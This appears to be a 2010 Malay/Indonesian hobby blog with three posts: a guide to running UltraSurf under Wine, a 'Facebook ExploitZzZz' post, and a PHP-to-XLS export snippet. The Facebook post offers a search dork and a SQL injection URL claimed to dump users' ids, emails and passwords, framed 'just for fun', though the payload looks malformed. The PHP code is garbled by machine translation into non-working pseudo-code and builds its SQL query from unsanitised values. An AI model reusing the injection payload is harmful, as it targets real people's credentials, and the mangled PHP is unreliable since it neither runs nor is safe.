Jumat, 27 Agustus 2010

Run Ultrasurf in Linux

Hari ini saya akan terangkan bagaimana cara
menjalankan UltraSurf dalam Linux.

1. Download WINE

2. Download ULTRASURF Download uxxx.exe
Ia adalah stand alone executable.

3. Download Must have native Windows™
libraries for Wine
.

Cara-cara menjalankan UltraSurf

4. Install wine.

5. extract native Windows™ libraries dalam
katalah /windows atau copy terus dalam
wine directiory windows/system32

6. Pindahkan ultrasurf uxxx.exe dalam item 5 tadi

7. Buka terminal tulis wine uxxx.exe
Nota : uxxx.exe ialah u998.exe. Jangan ikut
uxxx.exe setelah kata itu




8. Untuk lebih mudah diharuskan menukar nama u998.exe
kepada ulrasurf.exe

Ok . .selamat berjuang . .

Sabtu, 21 Agustus 2010

Facebook ExploitZzZz

JUST FOR FUN




#DORK#

inurl:"facebook.com/home.php?charset_test"

#EXPLOITZ#

-(isikan id fb tman anda)+union+all+select+45,23,32,(id,03xa,name,03xa,email,03xa,password03xa)+82%25%29AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&fee182&user&maho--


#DEMO#

http://www.facebook.com/home.php?charset_test=-28222425100006235+union+all+select+45,23,32,(id,03xa,name,03xa,email,03xa,password03xa)+82%25%29AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&fee182&user&maho--

Selasa, 10 Agustus 2010

PHP ==> XLS

Contoh PHP ekspor ke format file XLS.
1. Buat Fungsi untuk XLS
fungsi xlsBOF () (
echo pack ("ssssss", 0x809, 0x8, 0x0, 0x10, 0x0,
0x0);
kembali;
)
fungsi xlsEOF () (
echo pack ("ss", 0x0A, 0x00);
kembali;
)
fungsi xlsWriteNumber ($ Row, $ Col, $ Value) (
gema pack ("sssss", 0x203, 14, $ Row, $ Col,
0x0);
echo pack ("d", $ Value);
kembali;
)
fungsi xlsWriteLabel ($ Row, $ Col, $ Value) (
$ L = strlen ($ Value);
echo pack ("ssssss", 0x204, 8 + $ L, $ Row, $
Col, 0x0, $ L);
echo $ Value;
kembali;
)


2. Kirim Header ke Browser dalam format
download.

/ Query Database /
$ hasil = mysql_db_query ($ dbname, "select id,
prename, nama, sname, grade dari appdata
mana saja '$ courseid =' dan detik '$ bagian ='")
/ / Kirim Header
header ("pragma: umum");
header ("Berakhir: 0");
header ("Cache-Control: must-revalidate, post-
check = 0, pre-check = 0");
header ("Content-Type: application / force-
download");
header ("Content-Type: application / octet-
stream");
header ("Content-Type: application / download");;
header ("Content-Disposisi: lampiran; nama file =
$ courseid-$ sec.xls "); / / À ¹ ° ¥ à ¹ ‰ ° § ° ™ °
μà ¹ à ¹ ° ‡ ° S ° à ¹ · ° à ¹" ° ¸ ¥ à ya ¹ œ
header ("Content-Transfer-Encoding: binary");
/ / XLS Data Cell
xlsBOF ();
xlsWriteLabel (1, 0, "Student Register $ semester /
$ tahun");
xlsWriteLabel (2, 0, "COURSENO:");
xlsWriteLabel (2, 1, "$ courseid");
xlsWriteLabel (3, 0, "JUDUL:");
xlsWriteLabel (3, 1, "$ title");
xlsWriteLabel (4 0, "SETION:");
xlsWriteLabel (4, 1, "$ sec");
xlsWriteLabel (6, 0, "NO");
xlsWriteLabel (6, 1, "ID");
xlsWriteLabel (6, 2, "Gender");
xlsWriteLabel (6, 3, "Nama");
xlsWriteLabel (6, 4, "NamaBelakang");
$ XlsRow = 7;
sementara (daftar ($ id, $ prename, $ nama, $
sname, $ grade) = mysql_fetch_row ($ hasil)) (
+ + $ I;
xlsWriteNumber ($ xlsRow, 0, "$ i");
xlsWriteNumber ($ xlsRow, 1, "$ id");
xlsWriteLabel ($ xlsRow, 2, "$ prename");
xlsWriteLabel ($ xlsRow, 3, "$ nama");
xlsWriteLabel ($ xlsRow, 4, "$ sname");
xlsRow $ + +;
)
xlsEOF ();
exit ();